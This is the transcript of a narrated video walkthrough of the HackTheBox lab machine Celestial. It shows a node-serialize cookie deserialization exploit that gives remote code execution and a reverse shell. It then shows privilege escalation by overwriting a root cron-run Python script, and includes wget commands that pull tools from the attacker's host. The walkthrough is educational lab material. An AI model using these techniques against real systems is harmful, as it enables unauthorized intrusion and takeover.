Everyone, and welcome to another edition of Can You Hack It? I am Ben, aka Iceman, and this week we're going to be taking a look at another system from Hackthebox.eu. This one's called Celestial. It's a Linux box with a little under a medium level of difficulty, and I'm going to be doing something a little bit different this week, which is recording my audio after the fact, because I actually managed to record the entire video for the box with my mic muted. And so as a result, I don't feel like redoing the entire box. So I'm going to try this doing kind of a voiceover thing. So if the audio doesn't always seem to line up, sorry, I did my best. I'm not really used to this. So let's go ahead and take a look at the box. Its IP address is 10.10.10.85. And so if we open up a terminal, and let's create a directory for our Nmap scan. So we'll make dir-p, and we'll do Celestial and Nmap, and what that'll do is that'll just allow us to create both the Celestial directory and the Nmap directory at the same time. And then if we cd into Celestial, and we can get our Nmap scan going, and so that's -t to make it aggressive, -sc and sv to enumerate scripts and versions, and then -v to make it verbose so it outputs while it's running, and OA for output all formats. We'll put that in nmap/quick, and then the IP address of the machine, of course, is 10.10.10.85. And so we get that running, and it looks like the machine's maybe offline. So if we try and ping it, and that works okay. So it's possible maybe it was just resetting or something. Run this again. And this time it looks like it's going to work, and we see that port 3000 is open. And so while we're waiting for it to enumerate what service is actually running on 3000, I believe it is a web server of some sorts, but as I may have mentioned or may not have mentioned, I may have mentioned in the original video recording, I haven't done this box in a while. So, and I didn't have any notes. So hopefully I don't screw it up too bad. Yeah, it looks like it's running Node.js, the Express framework. And so let's see. It supports get, head, post options as the supported methods. Now, what I've been doing recently is running burp in the background anytime I do any of these. Reason for that is just to kind of have a transaction log of all the web requests that are made. So we don't necessarily need it at this point, but I've been trying to get into the habit of always running it at the start. That way, if I do say, oh, why, I wonder why something happened, I can go back and I can look at the HTTP logs. And so I'll actually want to turn off the interception at this point because we don't want to intercept requests. And then we'll want to navigate to that 10.10.10.85 on port 3000 after we set to use our burp proxy. And so once the web page comes up, we see a 404. And so if we look at the source, you see a H1 tag with 404 in it, which is a little interesting. So if we go ahead and close the source view and go to burp, look at our HTTP history, we can see in the response that we actually got a 200 back. It wasn't a 404. And we can see 64 that there's a cookie set. And so that's kind of interesting. This cookie looks like it's URL encoded and base64 encoded, probably, because as you see the %3D, %3D is URL encoding of the ==, which is padding that's used in base64. So in the decoder here, we can actually just do the multi-step decode by first taking that, decoding it as URL, and then taking the result and decoding that as base64. We can see that what that turns out is it looks like a JSON object. It's got username, country, city, and num in it. And so it looks like it's just some default data, possibly. So we go back and we refresh this page now that we have a cookie set. See, we see something different. And we do. We see, hey dummy, 2 + 2 is 22. It's a little interesting. I don't think they're intending on insulting us. The author's just being funny. So the username, if you noticed back in Burp, was actually dummy. And the num is 2. And so what's happening here, I think, and you may be familiar if you do a lot of programming, is that 2 is encased in quotes, so it's being treated as a string. And so it's doing string concatenation, and that's what's giving us 22, is it's just the string 2 plus the string 2 is equal to 2. And so I think what we'll do next is open up a window and get gofuzz running in the background so we can see if there's anything else running on this web server. And so we'll do -w and we'll give it a word list. We'll just use the traditional dirbuster directory 2.3 medium. We'll do -hrc to hide response codes of 404. We'll do SFR, which is show full responses, -t to make it to make 100 threads, -r to recurse into directories, and then -ext to do PHP extensions. And then we'll give it the URL that we want to fuzz. And I forgot to include the keyword fuzz. And so now we've got that going in the background. We can go back to kind of manually messing around with this a bit. And so if we go back to our history and go to the successful request and send it to repeater, we can kind of play with it a little bit. And so first we need to hit Control-Shift-U and then Control-Shift-B to un-URL encode it and base64 encode it, or base64 decode it, I guess. Let's change the username to please subscribe just to see what happens if that's what the web page is getting the value from. We could also change num, but for now let's just do one field. And so we encode that. And I missed a character, so fix that. Select the whole thing, and then URL encode. And so we see, hey, please subscribe, 2 + 2 is equal to 22. So it is taking the values from that cookie. And so now if we just change num to something else, since it's a string, see if we can use other strings, do who am I in case it happens to be passing it through anything in a terminal, which I highly doubt, but so we go ahead and base64 encode that and then URL encode it, run that, and we get an error. We see a reference error, who am I is not defined, at eval anonymous. So what we're seeing here is it looks like they've got some anonymous function that's got eval in it, and it can't find the who am I type or variable. So we may be able to do something with that just because of the fact that they're calling eval, which if you're familiar with it, we can pass whatever code into as a string and it should execute it. In this case, it's doing something weird with our who am I value that we passed in as num, and so it's causing a reference exception. We can actually see that the user is Sun that it's running under because we can see his full path there. We still don't have anything in gofuzz yet, so what we'll do is just continue to kind of mess around with this by hand. Now if we take a quick look on Google and we look for Node.js and Express, which is the framework it's running, and see if there's anything with serialize and deserialize, since we're likely using a library for handling the serialization and deserialization of that JSON object that's in that cookie. And so the first link we see has to do with a deserialization bug that allows RCE. And so we can see here that that there's an issue with JSON objects actually allowing code execution because of immediately invoked function expressions. And so for those that aren't familiar, immediately invoked function expressions are what it means essentially is that as soon as a function is defined, an anonymous function is defined, it will be executed by the JavaScript engine. And so in other languages, they're sometimes called self-executing anonymous functions. And so I'll give you an example of what they look like here. So you have function, you've got your anonymous function, and do something, whatever it is, your code in here. And then at the end you have your open and close parentheses. And so that actually creates a function call to that anonymous function, and the engine will execute that right away. And so that's an IIFE. And so what we can do is replace do something with something like a console.log and say hello. And so what should happen if this is ran in Node would be that the console prints out hello. So we'll check our GoBusters, still nothing. So what we can do is kind of play around with Node locally to kind of demonstrate some of these concepts. And so we'll set a variable called serialize to require node-serialize. And then we will create an object called test. And we'll give it some attributes. Give it name is please subscribe. And we'll give it a function or a attribute called RCE, and that's going to contain our anonymous function. So that's function. And then we can put our console.log statement in here. And then we close that off. And then we'll actually not create an IIFE just yet. We'll leave it as a normal anonymous function just so that we can see what the JSON output looks like. And so we'll close the object off. We'll do a var x equals serialize.serialize. And we'll pass it the test object. And then we'll do a console.log. And we'll print out the value of that serialized object. So if we write and quit, and then we execute that in Node, and we got an exception. The exception is because we don't actually have the node-serialize module installed, so we can use the Node package manager to install that. And so now that that's installed, we can try and run it. And so what we can see here is we see our name, please subscribe. The whole thing's JavaScript, a JSON object, just like what we were seeing in our cookie. And then under RCE, we actually see our anonymous function. And we see that console log message that would execute a console log with the message hello. And so if we go back and we edit that file and we add the parentheses at the end here, this should cause Node to execute this anonymous function immediately as soon as it's declared. And so what we see there is now it is no longer an attribute of that object. Instead, it just executed. And so we saw hello at the top, and then we see serialized, and now only name is in our object. So if we go back in to edit that, let's make it do something a little more interesting so we can actually show a RCE instead of just printing out some random value. And so what we can do is we can require a child process and do an exec, and we'll just do a who am I to see who we are. And we'll need to tie the standard output to log console. So we'll do function error std out, std error, and then console.log, std out. So we'll close that up. And then we can write and save that. And then if we execute it now, and we can see root there. And so we can see that we got code execution. Again, we see our JSON object above doesn't have that particular attribute because that portion of the code was executed immediately. And so what we can do is see if our gofuzz has found anything, which it hasn't. So we can try and see if we can get RCE and get a remote shell. So we'll start out netcat on port 4444. And then let's see if this page happens to mention, since they're talking about the same thing, a place to get a node reverse shell. We could Google for it also. If we don't see it here, it looks like there's actually a link right there. So looks like there's a Java or a Python script. So we look at the raw version of it. We can copy and paste this. It looks what it does is create some JavaScript that creates a network connection back to a host that's specified and ties a shell that it spawned in with that network connection. So if we create a new file, we'll call it revshell.py, paste in the contents of that, and we'll save and exit. And then if we run it with Python revshell.py, we can see it wants a local host and a local port. So we give it 10.10.14.15 and port 4444. And the output here is an eval statement along with string from char code, which is a string that's built from all the character codes. And so we can actually look and see what this looks like if we create a new test file, test2.js, and we can just wrap that with a console.log. And what that'll do is that'll allow us to see what the string that we're actually using here looks like. So we call node and then test2.js. And you can see that it's got my host port. It's got some checking on that on the string. Let's see, it's got a function that takes the host and the port, it creates a network connection, and then spawns a shell, ties those together, and prints out connected when it's actually connected. And so if we take that code now, including the eval statement, and let's put it in our original test file, and we'll put it in place of this who am I statement that we have. So we'll clear that out. And we'll paste that. Then we're actually going to want to remove these the open and close parentheses at the end that create the IIF or IIFE, because we don't want this to actually execute on our local system. We just want to get the JSON formatted field for that JSON string that we're using in our cookie. And so now if we run this, we see we've got the RCE entry there, and if we just copy that all the way down to the quote, and we can just take that and put it in burp. Let's see, we just decode this, which is Control-Shift-U, Control-Shift-B. And let's put num back to a number. And then let's just, oops. Let's just encode this and make sure that it's still working. And so that looks fine. And so now we paste in our RCE field. And let's up the number just so we can make sure we see that it executed. And URL or base64 encode it, URL encode it, and then we'll go ahead and let it fly. And 6 plus 6 is 66. And so if we go to our window with that listener, and we don't see anything connected yet, the reason why is we screwed up and forgot to put the open and closing parentheses that actually turn it into an IIFE. So if we add those right before this ending double quote, and then we just need to select this all again, base64 encode it, URL encode it, and send it off. Again, please see 6 plus 6 is 66. And now we get that connected message. And so if we do a who am I, apparently my pace was off a little bit, and so we're Sun. And so now let's upgrade our terminal to something a little more user-friendly. So if we do a python-c import pty, pty.spawn, and bin bash. So that gets us a Python pty. And then we can Control-Z to background it, do a stty raw minus echo, do a fg, foreground it, and then do a reset, and then set the terminal type, which is xterm 256 color. And so now we should have tab completion, so we test that. Yep, looks good. And so if we do an lsl, and we can see in this directory we've got our standard folders for desktop version of Linux, and we've also got a node modules folder which we saw before. It looks like we're running Ubuntu, and we have an output.txt file that's owned by root, and so that could be interesting. So what we want to do is just take a look and see what is in there, since we're actually able to read it. It just says the script is running. So it's possible there's a script that runs as root that outputs here. So that's a possible way to PrivEsc. Let's take a look in desktop, see if we can find the user key or the user flag. It's not in desktop, it doesn't look like. It is in documents, okay. And so if we switch to documents, and then we cat the user flag, and we'll send it to cut and just show the first 16 characters of it. And so there you can see we can access the user flag. So next thing we need to do is figure out how to get our privilege escalation. And so I think we'll take a quick look here at that script.py and see what it's all about. We can actually see it prints out script is running. And so it's likely what's responsible for that output.txt we saw below. But since the output below was owned by root, and this is owned by Sun, it's likely that it's being called either by root directly, like he was logged in, or by a script that's running as root. And so what we'll need to do next is just we'll switch somewhere where we can get LinEnum. Oh, actually, I guess I forgot to do that. So here I renamed output.text to output.old, and the reason I did that was to see if later on output.text reappears, because if it does, then we know that there's a script that's running it. And then in the meantime, we switch to devshm, which is a RAM disk, and create a hidden directory called temp, and then we'll download LinEnum from our local system. So we cd to where I keep that, and we start up a Python web server on port 80. And we see that actually our gofuzz finished without finding anything. And I'm in the wrong tab, I believe. quite sure what I was talking about there. So now we do a wget http://1010.14.15/LinEnum.sh, download the script, and do a chmod +x to make it executable. And then we'll go ahead and execute that and dump the output to LinEnum.txt. And so that should take a few seconds to run. And so it looks like that's finished. Now we take a look at the output from that. This will be fun to try and voice over after the fact. So we can see it's running Xennial. Host name is Sun. The user's Sun. We're the only ones logged in. Nothing super interesting there. Let's see, super user accounts are root. Environmental information, we've got a ton of environmental variables set, but none of them look particularly interesting. I think I pointed out that at some point I'm going to say something doesn't look interesting in one of these videos, and it's going to be where there is something that is interesting. And so hopefully when that happens, you point it out and embarrass me. Let's see, so available shells, password information, cron jobs. Don't see anything too interesting in any of these spots. More cron stuff. More cron, networking information, nothing too interesting there. List of running processes. When I look at the list of running processes, I typically try and find things that are running that are abnormal and are running with elevated privileges, like running under the context of root. And so in this case, I didn't see anything too interesting. List of binaries. So yeah, I don't see anything super interesting in any of this. It's possible that I actually managed to overlook something, but so next thing we'll do is just run dmesg and grep it to grep it to script.p or grep for script.py. See if there's anything about that script.py. We can check syslog for the same thing. And we can actually see here that there's records of it being called as root under a cron job. Looks like it's running the script. It's sending the output to output.txt. And then it's copying a script from root over to the user's directory. And then it's having Sun own it and doing some change attributes. And so it's likely that we can just modify that script since Sun's the one that owns it in order to get us permissions. And since it's copying that the original script over it afterwards, we should be able to get it to execute our own code. And so now if we just take a look real quick, let's pull up Python reverse shells. And there should be the standard pen test monkey one. So if we copy that, and we can try and edit it in here. Sometimes VI seems to act goofy in these pseudo TTYs. So we paste it, remove this quote at the end, and remove the Python-C at the beginning. And that doesn't seem to be working, which is kind of what I was talking about with the screwiness. So let's go ahead and just quit out of that, and we can edit it locally and then just use wget to pull it. And so kill the Python web server, and then vim rev shell.py. Remove this Python-C, and then update this IP address to our IP, 10.10.14.15. We can leave it on port 1234, and we'll change the shell to bash. And so now if we do a wget http://10.10.14.15 revshell.py, and then we just need to remove the original one, and actually let's start our listener on 1234 first, and then we can remove the original script.py file, and we'll replace it with ours. So we'll remove it and cp revshell.py to, and I actually screwed up here and typed usr, sun documents script.py, and then that gave an error saying it couldn't create it. And the reason it couldn't create it is I had actually screwed up and typed usr instead of home. I don't think I noticed that right away. I noticed that I also missed the S on documents. Still didn't work. I think I pulled it up and removed the beginning part because we did delete that. Tried to run it again, same error. Then I noticed the USR, so changed that to home. And removed the stuff at the beginning since we'd already deleted that file. And then this time it should be okay. And then if we take a look again at the syslog, we can see that this is running in 5-minute intervals, it looks like. And so if we take a look at what the current time is on the system, on date, and it looks like we're 1 minute and 15 seconds off. We'll use the magic of editing to remove that 1 minute and 15 seconds. And so we run date again. Now we're about 7 seconds off, 3 seconds off, switch over, wait, and there we go. We've got a reverse shell as root. So if we do who am I or an ID, you can see that we're root. So if we switch to the root directory, an ls, you can see root.txt and that script.py that gets copied back over. You look at the contents of it, it's the same as what we saw before. And then if we do a cat root.txt and pipe it to cut, you can see that we can read the root.txt file, and so we've got ownership of the system. I think that's it for this one. Feel free to like the video, subscribe, hit me up on Twitter or Hackthebox. On Hackthebox, my delays have been a little delayed lately. I've been busy at work, so just keep that in mind. Hope you enjoyed the video, and we will see you on the next one.